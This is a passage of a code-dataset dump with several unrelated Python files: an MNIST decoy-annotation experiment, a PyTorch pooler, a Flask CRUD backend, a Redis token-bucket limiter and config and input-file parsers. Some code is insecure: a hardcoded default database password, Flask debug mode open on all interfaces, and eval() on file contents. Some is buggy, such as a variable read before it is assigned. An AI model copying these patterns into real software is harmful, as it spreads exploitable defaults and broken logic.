self._generate_dataset(os.path.dirname(cachefile))\n if cachefile:\n np.savez(cachefile, *data)\n self.Xr, self.X, self.y, self.E, self.Xtr, self.Xt, self.yt, self.Et = data\n self.status.initialized = True\n\n def get_sample(self, dataset, idx):\n if not self.status.initialized:\n raise AttributeError('Generate dataset before fetching samples.')\n if dataset == Dataset.TRAIN:\n return Xr[idx]\n elif dataset == Dataset.TEST:\n return Xtr[idx]\n\n def load_annotations(self, **hypothesis_params):\n num_annotations = hypothesis_params.pop('num_annotations', None)\n hypothesis_weight = hypothesis_params.pop('hypothesis_weight', 0)\n annotation_files = [os.path.join(ANNOTATIONS_DIR, x)\n for x in os.listdir(ANNOTATIONS_DIR)\n if x.endswith('.npy')][:num_annotations]\n\n A = np.zeros(self.X.shape).astype(bool)\n affected_indices = []\n for f in annotation_files:\n try:\n index = int(f.split('/')[-1].split('.')[0])\n mask = np.load(f)\n affected_indices.append(index)\n A[index] = mask\n except:\n continue\n\n self.affected_indices = affected_indices\n self.hypothesis = Hypothesis(\n A, weight=hypothesis_weight)\n self.status.annotations_loaded = True\n\n def unload_annotations(self):\n self.hypothesis = None\n self.status.annotations_loaded = False\n\n def set_annotation(self, idx, mask):\n mask = np.array(mask)\n if idx < len(self.annotation_idxs):\n annotation_idx = self.annotation_idxs[idx]\n print('Saving {}'.format(annotation_idx))\n np.save(os.path.join(ANNOTATIONS_DIR, str(annotation_idx)), mask)\n else:\n raise IndexError(\n 'idx must be less than the current number of annotations')\n\n def _get_mask_from_idx(self, idx):\n print('Loading {}'.format(idx))\n annotation_path = os.path.join(ANNOTATIONS_DIR, str(idx) + '.npy')\n if os.path.exists(annotation_path):\n return np.load(annotation_path).tolist()\n return None\n\n def _convert_image_to_base64(self, image):\n try:\n buffered = BytesIO()\n except:\n buffered = cStringIO.StringIO()\n image.save(buffered, format='PNG')\n return base64.b64encode(buffered.getvalue()).decode('utf-8')\n\n def get_annotation(self, idx):\n if idx < len(self.annotation_idxs):\n annotation_idx = self.annotation_idxs[idx]\n image = self.get_image(self.X[annotation_idx])\n mask = self._get_mask_from_idx(annotation_idx)\n elif idx == len(self.annotation_idxs):\n while True:\n annotation_idx = random.randint(0, len(self.X) - 1)\n if annotation_idx in self.annotation_idxs:\n continue\n self.annotation_idxs.append(annotation_idx)\n image = self.get_image(self.X[annotation_idx])\n mask = []\n break\n else:\n raise IndexError(\n 'idx must be less than or equal to the current number of annotations')\n return {\n 'annotation_idx': idx,\n 'data': 'data:image/png;base64,' + self._convert_image_to_base64(image),\n 'mask': mask\n }\n\n def delete_annotation(self, idx):\n if idx < len(self.annotation_idxs):\n annotation_idx = self.annotation_idxs[idx]\n annotation_path = os.path.join(\n ANNOTATIONS_DIR, str(annotation_idx) + '.npy')\n try:\n os.remove(annotation_path)\n except IOError:\n pass\n else:\n raise IndexError(\n 'idx must be less than the current number of annotations')\n\n def train(self, num_epochs=6):\n self.model = MultilayerPerceptron()\n self.num_epochs = num_epochs\n if self.status.annotations_loaded:\n self.model.fit(self.X,\n self.y,\n hypothesis=self.hypothesis,\n num_epochs=num_epochs,\n always_include=self.affected_indices)\n else:\n self.model.fit(self.X, self.y, num_epochs=num_epochs)\n self.status.trained = True\n\n @property\n def metadata(self):\n if self.hypothesis.per_annotation:\n weight = self.hypothesis.weight / max(self.hypothesis.num_annotations, 1)\n else:\n weight = self.hypothesis.weight\n return {\n 'name': self.name,\n 'hypothesis_weight': weight,\n 'per_annotation': self.hypothesis.per_annotation,\n 'n_annotations': self.hypothesis.num_annotations,\n 'train_accuracy': self.train_accuracy,\n 'test_accuracy': self.test_accuracy,\n 'num_epochs': self.num_epochs\n }\n\n def save_experiment(self):\n filename = str(int(time.time()))\n self.name = filename\n self.train_accuracy, self.test_accuracy = self.score_model()\n save_dict = self.__dict__.copy()\n do_not_save = ['Xr', 'X', 'y', 'E', 'Xtr', 'Et']\n for attr in do_not_save:\n save_dict.pop(attr)\n\n with open(os.path.join(DecoyMNIST.MODELS_DIR, filename), 'wb') as f:\n pickle.dump(save_dict, f)\n with open(DecoyMNIST.SAVED_EXPERIMENTS_CACHE_FILE, 'rb') as f:\n try:\n saved_experiments = json.load(f)\n except Exception:\n saved_experiments = []\n with open(DecoyMNIST.SAVED_EXPERIMENTS_CACHE_FILE, 'wb') as f:\n saved_experiments.append(self.metadata)\n json.dump(saved_experiments, f)\n return filename\n\n\n def explain(self, idx=None):\n if not self.status.trained:\n raise AttributeError(\n 'You must have trained the model to be able to generate explanations.')\n\n if idx is None:\n idx = random.randint(0, len(self.Xt))\n\n predicted_label = self.model.predict(np.array([self.Xt[idx]]))[0]\n\n explanation_grid(self.model.grad_explain(np.array([self.Xt[idx]])), (28, 28), size=50)\n\n # Get explanation image\n filename = 'temp{}'.format(int(time.time()))\n plt.savefig(filename)\n explain_image = self._convert_image_to_base64(Image.open(open(filename + '.png', 'rb')))\n os.remove(filename + '.png')\n\n return {\n 'data': 'data:image/png;base64,' + explain_image,\n 'ground_truth': int(self.yt[idx]),\n 'predicted': predicted_label\n }\n\n def explain2(self, idx=None):\n if not self.status.trained:\n raise AttributeError(\n 'You must have trained the model to be able to generate explanations.')\n\n if idx is None:\n idx = random.randint(0, len(self.Xt))\n\n image = self.Xt[idx]\n image = np.reshape(image, (28, 28))\n predicted_label = self.model.predict(np.array([self.Xt[idx]]))[0]\n\n def preprocessor(inputs):\n inputs = inputs[:, :, :, 0]\n return np.reshape(inputs, (-1, 784))\n\n self.model.input_preprocessor = preprocessor\n\n explainer = lime_image.LimeImageExplainer()\n explanation = explainer.explain_instance(image,\n self.model.predict_proba,\n top_labels=10,\n num_samples=3000)\n temp, mask = explanation.get_image_and_mask(\n predicted_label, positive_only=False, hide_rest=False)\n masked_image = mark_boundaries(temp / 2 + 0.5, mask)\n image = Image.fromarray(masked_image.astype('uint8'))\n image.show()\n masked_image_binary = self._convert_image_to_base64(image)\n return {\n 'data': 'data:image/jpg;base64,' + masked_image_binary,\n 'ground_truth': int(self.yt[idx]),\n 'predicted': predicted_label\n }\n\n def score_model(self):\n return (\n self.model.score(self.X, self.y),\n self.model.score(self.Xt, self.yt)\n )\n\n def download_mnist(self, datadir):\n if not os.path.exists(datadir):\n os.makedirs(datadir)\n\n base_url = 'http://yann.lecun.com/exdb/mnist/'\n\n def parse_labels(filename):\n with gzip.open(filename, 'rb') as fh:\n magic, num_data = struct.unpack(\">II\", fh.read(8))\n return np.array(array.array(\"B\", fh.read()), dtype=np.uint8)\n\n def parse_images(filename):\n with gzip.open(filename, 'rb') as fh:\n magic, num_data, rows, cols = struct.unpack(\n \">IIII\", fh.read(16))\n return np.array(array.array(\"B\", fh.read()), dtype=np.uint8).reshape(num_data, rows, cols)\n\n for filename in ['train-images-idx3-ubyte.gz', 'train-labels-idx1-ubyte.gz',\n 't10k-images-idx3-ubyte.gz', 't10k-labels-idx1-ubyte.gz']:\n if not os.path.exists(os.path.join(datadir, filename)):\n try:\n urlretrieve(base_url + filename,\n os.path.join(datadir, filename))\n except:\n with open(os.path.join(datadir, filename), 'w') as f:\n f.write(urlopen(base_url + filename).read())\n\n train_images = parse_images(os.path.join(\n datadir, 'train-images-idx3-ubyte.gz'))\n train_labels = parse_labels(os.path.join(\n datadir, 'train-labels-idx1-ubyte.gz'))\n test_images = parse_images(os.path.join(\n datadir, 't10k-images-idx3-ubyte.gz'))\n test_labels = parse_labels(os.path.join(\n datadir, 't10k-labels-idx1-ubyte.gz'))\n\n return train_images, train_labels, test_images, test_labels\n\n def Bern(self, p):\n return np.random.rand() < p\n\n def augment(self, image, digit, randomize=False, mult=25, all_digits=range(10)):\n if randomize:\n return self.augment(image, np.random.choice(all_digits))\n\n img = image.copy()\n expl = np.zeros_like(img)\n\n fwd = [0, 1, 2, 3]\n rev = [-1, -2, -3, -4]\n dir1 = fwd if self.Bern(0.5) else rev\n dir2 = fwd if self.Bern(0.5) else rev\n for i in dir1:\n for j in dir2:\n img[i][j] = 255 - mult * digit\n expl[i][j] = 1\n\n return img.ravel(), expl.astype(bool).ravel()\n\n def _generate_dataset(self, datadir):\n X_raw, y, Xt_raw, yt = self.download_mnist(datadir)\n all_digits = list(set(y))\n\n X = []\n E = []\n Xt = []\n Et = []\n\n for image, digit in zip(X_raw, y):\n x, e = self.augment(image, digit, all_digits=all_digits)\n X.append(x)\n E.append(e)\n\n for image, digit in zip(Xt_raw, yt):\n x, e = self.augment(\n image, digit, all_digits=all_digits, randomize=True)\n Xt.append(x)\n Et.append(e)\n\n X = np.array(X)\n E = np.array(E)\n Xt = np.array(Xt)\n Et = np.array(Et)\n Xr = np.array([x.ravel() for x in X_raw])\n Xtr = np.array([x.ravel() for x in Xt_raw])\n\n return Xr, X, y, E, Xtr, Xt, yt, Et\n\n def get_image(self, array):\n img = array.reshape((28, 28))\n img = Image.fromarray(img)\n return img\n\n def generate_tagging_set(self, Xtr, size=20):\n indices = []\n for i in range(size):\n index = npr.randint(0, len(Xtr))\n if index in indices:\n continue\n indices.append(index)\n image = self.get_image(Xtr[index], index)\n image.save('tagging/decoy_mnist/' + str(index) + '.png')\n\n\nif __name__ == '__main__':\n print('Training with annotations')\n decoy_mnist = DecoyMNIST()\n decoy_mnist.generate_dataset()\n decoy_mnist.load_annotations(weight=10, per_annotation=True)\n # decoy_mnist = DecoyMNIST.load_experiment('1525843725', prepend_path=True)\n decoy_mnist.train(num_epochs=1)\n decoy_mnist.save_experiment()\n # decoy_mnist.explain()\n # print(decoy_mnist.explain())\n\n # print('Training without annotations')\n # decoy_mnist.unload_annotations()\n # decoy_mnist.train(num_epochs=2)\n # print(decoy_mnist.score_model())\n","sub_path":"rfft/applications/decoy_mnist.py","file_name":"decoy_mnist.py","file_ext":"py","file_size_in_byte":14191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94183335","text":"import torch\nimport torch.nn as nn\n\nfrom medtrialextractor.constants import INFINITY\n\nclass Pooler(nn.Module):\n def __init__(self, config):\n super(Pooler, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.activation = nn.Tanh()\n\n def pool_head(self, hidden_states, mask):\n # Use the representation of START MARKER\n extended_mask = mask.unsqueeze(1)\n h = torch.bmm(extended_mask.float(), hidden_states).squeeze(1)\n h = self.activation(self.dense(h))\n return h # batch_size, seqlen\n\n def pool_span(self, hidden_states, mask):\n # MaxPooling over the whole span\n extended_mask = mask.unsqueeze(-1).bool()\n h = hidden_states.masked_fill(~extended_mask, -INFINITY)\n h = torch.max(h, dim=1)[0]\n h = self.activation(self.dense(h))\n return h\n\n\n","sub_path":"medtrialextractor/models/pooler.py","file_name":"pooler.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"599925874","text":"from flask import Flask, jsonify, request\nimport os\nimport BusinessObjects as bo\nimport DataObjects as do\n\napp = Flask(__name__)\n\ndb_ip = os.getenv('db_ip') #'10.0.2.15'\nConnectionData = {}\nConnectionData['user'] = 'postgres'\nConnectionData['password'] = 'postgres'\nConnectionData['host'] = str(db_ip)\nConnectionData['port'] = '5432'\nConnectionData['database'] = 'thigiuaki'\n\n@app.route('/')\ndef hello(): \n #return 'this is backend'\n c1 = bo.Customer(1, 'DAU xanh', 'Peter', '566 Nui Thanh', 'Danang', '50000', 'Vietnam')\n return c1.City\n\n@app.route('/customer_insert')\ndef test_insert():\n #ConnectionString = 'database=northwind user=postgres password=postgres host=10.0.2.15 port=5432'\n c2 = do.Customer(ConnectionData)\n c1 = bo.Customer(1, 'Lanh', 'Nguyen', '566 Nui Thanh', 'Danang', '50000', 'Vietnam')\n s1 = c2.insert(c1)\n return s1\n \n@app.route('/ca_insert')\ndef test_insertca():\n #ConnectionString = 'database=northwind user=postgres password=postgres host=10.0.2.15 port=5432'\n c2 = do.Categories(ConnectionData)\n c1 = bo.Categories(1 , 'hello' , 'dadadad')\n s1 = c2.insert(c1)\n return s1\n\n# CUSTOMER API\n# Insert\n@app.route('/customer/insert', methods=['POST'])\ndef user_insert():\n data = request.json\n c1 = bo.Customer(data['CustomerID'], \n data['CustomerName'],\n data['ContactName'], \n data['Address'], \n data['City'], \n data['PostalCode'], \n data['Country'])\n c2 = do.Customer(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n\n\n#Show all item from Customer\n@app.route('/customer/all_Customer')\ndef get_all_user():\n result = do.Customer(ConnectionData).get_all()\n return jsonify(result), 200\n# --------------------\n\n# Delete customer\n@app.route('/customer/delete/' , methods=['DELETE'])\ndef delete_user_by_id(customer_id):\n c = bo.Customer(CustomerID = customer_id)\n result = do.Customer(ConnectionData).delete(c)\n return jsonify({'message': result[0]}),result[1]\n# Update customer\n\n@app.route('/customer/update/' , methods=['PUT'])\ndef update_coustomer(customer_id):\n data = request.json\n c = bo.Customer(CustomerID = customer_id , CustomerName=data['CustomerName'], ContactName=data['ContactName'], Address=data['Address'], City = data['City'], PostalCode=data['PostalCode'], Country=data['Country'])\n result = do.Customer(ConnectionData).update(c)\n return jsonify({'message': result[0]}),result[1]\n\n#Show some row by ID\n@app.route('/customer/get/')\ndef get_user_by_id(user_id):\n c = bo.Customer(CustomerID = user_id)\n result = do.Customer(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}) , result[0]\n return jsonify(result[0].to_json()) , 200\n \n\n# Categories API\n@app.route('/categories/all')\ndef get_all_ca():\n result = do.Categories(ConnectionData).get_all()\n return jsonify(result), 200\n \n@app.route('/category/insert', methods=['POST'])\ndef insert_category():\n data = request.json\n category = bo.Categories(category_name=data['category_name'], description=data['description'])\n result = do.Categories(ConnectionData).insert(category)\n return jsonify({'message': result}), 200\n\n@app.route('/category/get/')\ndef get_category_by_id(category_id):\n category = bo.Categories(CategoryID=category_id)\n result = do.Categories(ConnectionData).get_by_id(category)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n\n@app.route('/category/update/', methods=['PUT'])\ndef update_category_by_id(category_id):\n data = request.json\n category = bo.Categories(CategoryID=category_id, CategoryName=data['category_name'], Description=data['description'])\n result = do.Categories(ConnectionData).update(category)\n return jsonify({'message': result[0]}), result[1]\n\n@app.route('/category/delete/', methods=['DELETE'])\ndef delete_category_by_id(category_id):\n c = bo.Categories(CategoryID=category_id)\n result = do.Categories(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n#*******************************************************************\n# Shipper \n\n\n@app.route('/shipper/all')\ndef get_all_shipper():\n c = do.Shippers(ConnectionData).get_all()\n return jsonify(c), 200\n\n@app.route('/shipper/get/')\ndef get_shipper_by_id(shipper_id):\n shipper = bo.Shippers(ShipperID=shipper_id)\n result = do.Shippers(ConnectionData).get_by_id(shipper)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n@app.route('/shipper/insert', methods=['POST'])\ndef insert_shipper():\n data = request.json\n shipper = bo.Shippers(ShipperName=data['shipper_name'], Phone=data['phone'])\n result = do.Shippers(ConnectionData).insert(shipper)\n return jsonify({'message': result}), 200\n\n@app.route('/shipper/update/', methods=['PUT'])\ndef update_shipper_by_id(shipper_id):\n data = request.json\n shipper = bo.Shippers(ShipperID=shipper_id, ShipperName=data['shipper_name'], Phone=data['phone'])\n result = do.Shippers(ConnectionData).update(shipper)\n return jsonify({'message': result[0]}), result[1]\n\n@app.route('/shipper/delete/', methods=['DELETE'])\ndef delete_shipper_by_id(shipper_id):\n c = bo.Shipper(ShipperID=shipper_id)\n result = do.Shippers(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\n# Supplier\n\n@app.route('/supplier/insert', methods=['POST'])\ndef supplier_insert():\n data = request.json\n c1 = bo.Suppliers(SupplierName=data['SupplierName'], ContactName=data['ContactName'], Address=data['Address'], City=data['City'], PostalCode=data['PostalCode'], Country=data['Country'], Phone=data['Phone'])\n c2 = do.Suppliers(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/supplier/all')\ndef get_all_supplier():\n result = do.Suppliers(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/supplier/get/')\ndef get_supplier_by_id(supplier_id):\n c = bo.Suppliers(SupplierID=supplier_id)\n result = do.Suppliers(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n\n@app.route('/supplier/update/', methods=['PUT'])\ndef update_supplier_by_id(supplier_id):\n data = request.json\n c = bo.Suppliers(SupplierID=supplier_id, SupplierName=data['SupplierName'], ContactName=data['ContactName'], Address=data['Address'], City=data['City'], PostalCode=data['PostalCode'], Country=data['Country'], Phone=data['Phone'])\n result = do.Suppliers(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n\n@app.route('/supplier/delete/', methods=['DELETE'])\ndef delete_supplier_by_id(supplier_id):\n c = bo.Suppliers(SupplierID=supplier_id)\n result = do.Suppliers(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n \n# Products:\n@app.route('/product/insert', methods=['POST'])\ndef product_insert():\n data = request.json\n c1 = bo.Products(ProductID=data['product_name'], Unit=data['Unit'], Price=data['price'], SupplierID=data['supplier_id'], CategoryID=data['category_id'])\n c2 = do.Products(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/product/all')\ndef get_all_product():\n result = do.Products(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/product/', methods=['GET', 'PUT', 'DELETE'])\ndef handle_product(product_id):\n if request.method == 'GET':\n # Get a product\n c = bo.Products(ProductID=product_id)\n result = do.Products(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update a product\n data = request.json\n c = bo.Products(ProductID=product_id, ProductName=data['product_name'], Unit=data['unit'], Price=data['price'], SupplierID=data['supplier_id'], CategoryID=data['category_id'])\n result = do.Products(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete a product\n c = bo.Products(ProductID=product_id)\n result = do.Products(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\n# Orders API\n\n@app.route('/order/all')\ndef get_all_order():\n result = do.Orders(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/order/insert', methods=['POST'])\ndef order_insert():\n data = request.json\n c1 = bo.Orders(OrderID=data['customer_id'], EmployeeID=data['employee_id'], OrderDate=data['order_date'], ShipperID=data['shipper_id'])\n c2 = do.Orders(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/order/', methods=['GET', 'PUT', 'DELETE'])\ndef handle_order(order_id):\n if request.method == 'GET':\n # Get an order\n c = bo.Orders(OrderID=order_id)\n result = do.Orders(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update an order\n data = request.json\n c = bo.Orders(OrderID=order_id, CustomerID=data['customer_id'], EmployeeID=data['employee_id'], OrderDate=data['order_date'], ShipperID=data['shipper_id'])\n result = do.Orders(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete an order\n c = bo.Orders(OrderID=order_id)\n result = do.Orders(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\n\n# Employee \n\n@app.route('/employee/all')\ndef get_all_employee():\n result = do.Employees(ConnectionData).get_all()\n return jsonify(result), 200\n\n\n@app.route('/employee/insert', methods=['POST'])\ndef employee_insert():\n data = request.json\n c1 = bo.Employee(LastName=data['last_name'], FirstName=data['first_name'], BirthDate=data['birth_date'], Photo=data['photo'], Notes=data['notes'])\n c2 = do.Employee(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n\n@app.route('/employee/', methods=['GET', 'PUT', 'DELETE'])\ndef handle_employee(employee_id):\n if request.method == 'GET':\n # Get an employee\n c = bo.Employees(EmployeeID=employee_id)\n result = do.Employees(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update an employee\n data = request.json\n c = bo.Employees(EmployeeID=employee_id, LastName=data['last_name'], FirstName=data['first_name'], BirthDate=data['birth_date'], Photo=data['photo'], Notes=data['notes'])\n result = do.Employees(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete an employee\n c = bo.Employees(EmployeeID=employee_id)\n result = do.Employees(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n# Order Detail\n@app.route('/order_detail/insert', methods=['POST'])\ndef order_detail_insert():\n data = request.json\n c1 = bo.OrderDetails(OrderDetailID=data['order_id'], ProductID=data['product_id'], Quantity=data['quantity'])\n c2 = do.OrderDetails(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/order_detail/all')\ndef get_all_order_detail():\n result = do.OrderDetails(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/order_detail/', methods=['GET', 'PUT', 'DELETE'])\ndef handle_order_detail(order_detail_id):\n if request.method == 'GET':\n # Get an order detail\n c = bo.OrderDetails(OrderDetailID=order_detail_id)\n result = do.OrderDetails(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update an order detail\n data = request.json\n c = bo.OrderDetails(OrderDetailID=order_detail_id, OrderID=data['order_id'], ProductID=data['product_id'], Quantity=data['quantity'])\n result = do.OrderDetails(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete an order detail\n c = bo.OrderDetails(OrderDetailID=order_detail_id)\n result = do.OrderDetails(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host='0.0.0.0', port=8080)\n ","sub_path":"webappbackend/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"162692110","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n############################################\n# File Name : Bucket.py\n# Created By : Suluo - sampson.suluo@gmail.com\n# Creation Date: 2018-07-10\n# Last Modified: 2018-10-31 22:26:34\n# Descption :\n# Version : Python 3.6\n############################################\nimport argparse\nimport time\nimport os\nimport sys\n\nfrom settings import SQL\n\nimport logging\n\n\nclass TokenBucketQPS(object):\n \"\"\"令牌桶\n arguments:\n rate: 令牌发放速度\n capacity: 桶的大小,令牌桶的容量\n \"\"\"\n\n def __init__(self, name, rate=0, capacity=None):\n self.logger = logging.getLogger(__name__)\n self._name = name\n self._rate = rate\n if capacity:\n self._capacity = capacity\n else:\n self._capacity = rate\n\n self.redis = SQL.redis\n\n self.current_name = self._name + \"_current\"\n self.time_name = self._name + \"_time\"\n\n self.redis.set(self.current_name, 0)\n self.redis.set(self.time_name, time.time())\n\n def consume(self, sn=None, token_amount=1):\n '''\n arguments:\n token_amount是发送数据需要的令牌数;\n '''\n t0 = time.time()\n status = False\n try:\n if self._capacity > 1 and self._rate > 1:\n _current_amount = self.redis.get(self.current_name)\n increment = int((time.time() - _last_consume_time) * self._rate)\n # 计算令牌桶中令牌的数量:(now_time-last_time)*speed, 从而避免程序阻塞;\n _last_consume_time = self.redis.get(self.time_name)\n self.logger.debug(f\"{sn} current {_current_amount} time {_last_consume_time}\")\n # 令牌容量不能超过桶容量;\n _current_amount = min(\n increment + _current_amount, self._capacity)\n self.redis.set(self.current_name, _current_amount)\n\n if token_amount > _current_amount:\n status = False\n else:\n self.redis.decr(self.current_name, amount=token_amount)\n status = True\n self.redis.set(self.time_name, time.time())\n else:\n status = True\n except Exception as e:\n self.logger.error(f\"{e}\", exc_info=True)\n finally:\n self.logger.info(f\"{sn} get consume {status} taks {time.time() - t0}\")\n return status\n\n\ndef main(args):\n return args.num\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--num', type=int, default=100, help='input num')\n args = parser.parse_args()\n main(args)\n\n\n","sub_path":"commons/util/Bucket.py","file_name":"Bucket.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"546107689","text":"#!python3\n#coding:utf-8\n\nimport configparser\nimport os\n# import smtplib\n# from email.mime.text import MIMEText\n# from email.mime.multipart import MIMEMultipart\n# import codecs\n\n#获取对应文件夹\nproDir=os.path.split(os.path.realpath(__file__))[0]\n\n#获取上级目录\ncurDir=os.path.dirname(proDir)\n#获取配置文件夹所在的路径\nconfigPath=os.path.join(curDir,\"config\\\\config.ini\")\n\nclass ReadConfig:\n def __init__(self):\n self.cf=configparser.ConfigParser()\n self.cf.read(configPath,encoding=\"utf-8-sig\")\n\n def get_email(self,name):\n value=self.cf[\"EMAIL\"][name]\n return value\n\n\n def get_http(self,name):\n # value=self.cf.get(\"testServer\",name)\n value=self.cf[\"testServer\"][name]\n return value\n\n\n# rc=ReadConfig()\n#\n# email=rc.get_email(\"mail_host\")\n# print(email)\n\n'''\nconf=configparser.ConfigParser()\nconf.read(\"C:\\\\Users\\\\liyan\\\\PycharmProjects\\\\Selnium_SaasWeb\\\\config\\\\config.ini\",encoding=\"utf-8-sig\")\nsections=conf.sections()\nlists=conf.items(\"EMAIL\")\n\nmail_host=conf.get(\"EMAIL\",\"mail_host\")\nmail_user=conf.get(\"EMAIL\",\"mail_user\")\nmail_pwd=conf.get(\"EMAIL\",\"mail_pwd\")\nmail_port=conf.get(\"EMAIL\",\"mail_port\")\nreceiver=conf.get(\"EMAIL\",\"receiver\")\n# 从config文件中读取有多种方式\n# subject=conf.get(\"EMAIL\",\"subject\")\nsubject=conf[\"EMAIL\"][\"subject\"]\ncontent=conf.get(\"EMAIL\",\"content\")\nprint('主题',subject)\n\n#这里发送的邮件不带附件\nmsg=MIMEText(content)\nmsg['Subject']=subject\nmsg['From']=mail_user\nmsg['To']=receiver\n\nsmtp = smtplib.SMTP( mail_host ,port=mail_port)\nsmtp.login(mail_user,mail_pwd)\nsmtp.sendmail(mail_user,receiver,msg.as_string())\n\n\n# #发送带附件的邮件\n# sendFile=open(\"D:\\\\autoAPI\\\\cookie.txt\",\"r\").read()\n# attr=MIMEText(sendFile,\"base64\",\"utf-8\")\n# attr[\"content-Type\"]=\"application/octet-stream\"\n# attr[\"content-Disposition\"]=\"attachment;filename='cookie.txt'\"\n#\n# msgRoot=MIMEMultipart(\"related\")\n# msgRoot[\"Subject\"]=\"我的邮件内容\"\n# msgRoot.attach(attr)\n#\n# smtp=smtplib.SMTP(mail_host,port=25)\n#\n# smtp.login(mail_user,mail_pwd)\n# smtp.sendmail(mail_user,receiver,attr.as_string())\n\nsmtp.quit()\nprint(\"邮件发送完毕\")\n\n'''\n\n\n","sub_path":"Selnium_SaasWeb/package/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"555302191","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/jobwrapper/inputclass.py\n# Compiled at: 2018-09-07 05:59:02\n# Size of source mod 2**32: 2575 bytes\nimport os, json\n\nclass inputparams:\n __doc__ = 'docstring for inputparams class'\n\n def __init__(self, path='./'):\n self._path = path\n self.parameters = {}\n self.read_inputfile()\n\n def getpath(self, path):\n \"\"\"same function as in other classes, could be refactored\"\"\"\n import tkinter\n from tkinter.filedialog import askdirectory\n if path is '':\n root = tkinter.Tk()\n path = askdirectory(parent=root, title='Select the HDF5 path')\n path = path + '/'\n root.destroy()\n self._path = path\n\n def isdumped(self):\n \"\"\"just return True or False is the file is already dumped\"\"\"\n return os.path.isfile(self._path + 'inputparams.txt')\n\n def read_inputfile(self):\n \"\"\"Parser of the input file , creating attributes of the class\"\"\"\n reps = {'D':'e', \n 'd':'e', \n '.TRUE.':'True', \n '.FALSE.':'False', \n '.False.':'False', \n 'Xe':'\"Xe\"', \n 'Ar':'\"Ar\"', \n 'FAr':'\"FAr\"', \n 'He':'\"He\"', \n 'Kr':'\"Kr\"', \n '=':''}\n with open(self._path + '/inputs') as (inputfile):\n [self.readinputline(line, reps) for line in inputfile]\n\n def readinputline(self, line, reps):\n if line[0] is '!':\n pass\n else:\n try:\n key, val = line.split(maxsplit=1)\n except ValueError:\n print('Error : The line is Empty !!')\n exit()\n\n if len(val.split()) > 1:\n val, __ = val.split(maxsplit=1)\n for old, new in reps.items():\n val = val.replace(old, new)\n\n try:\n self.parameters[key] = eval(val)\n except SyntaxError:\n print(key, val, line)\n\n def __str__(self):\n strings = ''\n for key, val in self.parameters.items():\n strings = ''.join([strings, key, ' = ', val, '\\n'])\n\n return strings","sub_path":"pycfiles/jobwrapper-0.1.1-py3.6/inputclass.cpython-36.py","file_name":"inputclass.cpython-36.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} 